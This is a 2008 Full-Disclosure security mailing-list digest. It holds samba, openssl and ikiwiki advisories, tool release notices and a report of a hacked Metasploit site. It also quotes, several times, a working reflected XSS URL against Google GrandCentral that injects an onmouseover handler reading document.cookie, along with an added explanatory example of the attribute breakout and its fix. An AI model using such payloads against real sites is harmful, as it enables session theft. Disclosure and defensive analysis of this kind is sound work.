Kristian Erik Hermansen | 1 Jun 21:54 2008

Google GrandCentral XSS 0day


Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=
--
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."

Kristian Erik Hermansen | 1 Jun 22:00 2008

Google GrandCentral XSS 0day

Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=
--
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Andrea Di Pasquale | 2 Jun 01:32 2008

ARP handler Inspection tool released

ArpON (Arp handler inspectiON) is a portable ARP handler.
It detects and blocks all ARP Poisoning/Spoofing attacks with the
Static Arp Inspection (SARPI) and Dynamic Arp Inspection (DARPI)
approaches on switched/hubbed LANs, with or without the DHCP protocol.
Important to note: it doesn't compromise the ARP protocol's performance.

     I need testing and code revision, thank you.

The link to the project's documentation is:
     http://arpon.sourceforge.net/about.html

The link to the project is:
     http://arpon.sourceforge.net


rPath Update Announcements | 2 Jun 14:47 2008

rPSA-2008-0180-1 samba samba-client samba-server samba-swat

rPath Security Advisory: 2008-0180-1
Published: 2008-06-02
Products:
    rPath Appliance Platform Linux Service 1
    rPath Linux 1
    rPath Linux 2

Rating: Critical
Exposure Level Classification:
    Remote Root Deterministic Unauthorized Access
Updated Versions:
    samba=conary.rpath.com@rpl:1/3.0.30-0.1-1
    samba=conary.rpath.com@rpl:2/3.0.30-1-0.1
    samba-client=conary.rpath.com@rpl:1/3.0.30-0.1-1
    samba-client=conary.rpath.com@rpl:2/3.0.30-1-0.1
    samba-server=conary.rpath.com@rpl:1/3.0.30-0.1-1
    samba-server=conary.rpath.com@rpl:2/3.0.30-1-0.1
    samba-swat=conary.rpath.com@rpl:1/3.0.30-0.1-1
    samba-swat=conary.rpath.com@rpl:2/3.0.30-1-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2582

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1105

Description:
    Previous versions of the samba package are vulnerable to an Arbitrary
    Code Execution attack in which a remote attacker may cause a heap-based
    buffer overflow via a maliciously crafted SMB response.

Greyhat Security | 2 Jun 18:04 2008

n3td3v.com

n3td3v Troll,

What's $80 to a high-caliber security researcher like yourself?

I bet it gets a lot of hits and has the potential to be at the top of the 60,000 google results for n3td3v.

How about n3td3vtrolling.com?

What about n3td3v.net -- is that your site?

All the best,

ghsec

-----Original Message-----
From: full-disclosure-bounces <at> lists.grok.org.uk [mailto:full-disclosure-bounces <at> lists.grok.org.uk] On Behalf Of n3td3v
Sent: Friday, May 30, 2008 6:36 PM
To: full-disclosure <at> lists.grok.org.uk
Subject: Re: [Full-disclosure] n3td3v.com

On Fri, May 30, 2008 at 7:29 AM, Sec Guy <secguy1978 <at> yahoo.com> wrote:
> I just saw n3td3v.com up for sale on sedo...
>
> https://sedo.com/search/details.php4?domain=n3td3v.com&tracked=&partnerid=&language=us
>
> -SecGuy
>

No one is going to pay $80 for it, you may as well give it to me for free ;)

All the best,

n3td3v

http://n3td3v.googlepages.com

Kristian Erik Hermansen | 2 Jun 18:49 2008

Re: Google GrandCentral XSS 0day

On Sun, Jun 1, 2008 at 1:00 PM, Kristian Erik Hermansen
<kristian.hermansen <at> gmail.com> wrote:
> Enjoy...
>
> http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=

Google has seemingly fixed this 0day in under 12 hours.  Congrats to
our boys at the GOOG...
--
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."
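
How a value like the one in the URL above ends up as markup, as an added example that is not part of the original posts: it assumes the search page echoed `search_last_name` into a double-quoted `value` attribute (the `<input>` template and all function names are hypothetical) and compares the unescaped render with an attribute-encoded one.

```javascript
// Added example, not from the original post. Only QUERY is taken from the
// posted URL; the <input> template and all function names are assumptions.
const QUERY =
  "search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D" +
  "&srchinbxtype=&srchcncttype=&search_keywords=";

// Form-decoding turns %22 into a double quote, %3D into "=" and "+" into a space.
function decodedParam(query, name) {
  return new URLSearchParams(query).get(name);
}

// Encode for an attribute value that is always emitted inside double quotes.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical vulnerable template: the raw value is pasted into the attribute.
function renderNaive(v) {
  return `<input name="search_last_name" value="${v}">`;
}

// Hardened template: same markup, value encoded for the attribute context.
function renderEscaped(v) {
  return `<input name="search_last_name" value="${escapeAttr(v)}">`;
}

// Small tokenizer for the one tag built above: lists its attribute names.
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+/, "").replace(/>$/, "");
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]*))?/g;
  const names = [];
  for (const m of inner.matchAll(re)) names.push(m[1].toLowerCase());
  return names;
}

// Event-handler attributes present in a rendered tag (names starting with "on").
function eventHandlers(tag) {
  return attributeNames(tag).filter((n) => n.startsWith("on"));
}

const value = decodedParam(QUERY, "search_last_name");
console.log(renderNaive(value), eventHandlers(renderNaive(value)));
console.log(renderEscaped(value), eventHandlers(renderEscaped(value)));
```

In the unescaped render the leading quote closes `value` early and the rest of the parameter is parsed as new attributes; once the quote is encoded as `&quot;` the whole string stays inside `value` as inert text.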


rPath Update Announcements | 2 Jun 19:09 2008

rPSA-2008-0181-1 openssl openssl-scripts

rPath Security Advisory: 2008-0181-1
Published: 2008-06-02
Products:
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Denial of Service
Updated Versions:
    openssl=conary.rpath.com@rpl:2/0.9.8g-6-0.1
    openssl-scripts=conary.rpath.com@rpl:2/0.9.8g-6-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2569

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1672

Description:
    Previous versions of the openssl package are vulnerable to a Denial
    of Service attack in which a malicious server may crash clients that
    connect using particular cipher suites.

http://wiki.rpath.com/Advisories:rPSA-2008-0181

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


Thijs Kinkhorst | 1 Jun 20:03 2008

[SECURITY] [DSA 1553-2] New ikiwiki packages fix regression


------------------------------------------------------------------------
Debian Security Advisory DSA-1553-2                  security <at> debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
June 01, 2008                         http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : ikiwiki
Vulnerability  : cross-site request forgery
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-0165
Debian Bug     : 475445

The update of ikiwiki in DSA-1553-1 caused two regressions. An updated
version of ikiwiki is available that fixes these problems. For reference,
the full advisory text is below.

It has been discovered that ikiwiki, a Wiki implementation, does not
guard password and content changes against cross-site request forgery
(CSRF) attacks.

For the stable distribution (etch), this problem has been fixed in
version 1.33.6.

For the unstable distribution (sid), this problem has been fixed in
version 2.42.

We recommend that you upgrade your ikiwiki package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6.tar.gz
    Size/MD5 checksum:   227416 015972590255cf03068b9446c733254f
  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6.dsc
    Size/MD5 checksum:     1015 f833af1b001adf3ac2bea69dfe2aeead

Architecture independent packages:

  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6_all.deb
    Size/MD5 checksum:   278396 f2f82d9f70008b403a952c12e02095b8

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce <at> lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Nicolas Waisman | 2 Jun 15:50 2008

Immunity Debugger 1.6 is out!


Immunity, Inc. proudly presents: IMMUNITY DEBUGGER 1.6

This release we are introducing the most requested feature since the
release of ID 1.0 in the form of automatic symbol downloading.

In the script department we included two awesome new scripts: treedll and
findloop. Yes, you read that correctly, we have implemented dominator
trees for your coverage analysis pleasure and you are now able to detect
loops inside functions.

Immunity Debugger 1.6 delivers more stability and fixes a lot of known
issues. For example the old AddKnowledge/PostAnalysis bug is gone and
the land of hooking is all happiness. Check the Changelog below for more
details.

Download it now: http://debugger.immunityinc.com/

For the next release we are working on variables and structure, so stay
tuned!

The Immunity ID Team

--------------
1.60 Build 0

New Features:

Debugger
  o Added 'Use Symbol Server' option
   [http://forum.immunityinc.com/index.php?topic=162]
  o Improved Getallnames
  o Added timestamp to log events

Immunity Debugger API
  o Added getAllSymbolsFromModule method
  o Added libcontrolflow.py
    Container for classes DominatorTree and ControlFlowAnalysis
  o Added Clear function to FastLogHook.

PyCommands
  o Added findloop.py: Find natural loops given a function start.
  o Added treedll.py: Creates imported dll tree.

Bug Fixes:
  o Fixed POST_ANALYSIS_HOOK "FATAL ERROR"
  o Fixed Arguments overflow (Thanks David Wetson for reporting this one!)
  o Local Symbol Path issue
  o Analysis second pass option now works
  o Getallsymbols now correctly creates the PyDict [Import/Export/Library issue]

Jacques Erasmus | 2 Jun 17:40 2008

Metasploit - Hack ?

Seems like the metasploit site has been hacked.

http://forum.eviloctal.com/redirect.php?tid=33254&goto=lastpost#lastpost

The links such as http://www.metasploit.com/framework etc. are redirecting to the above site – is anyone else seeing this?

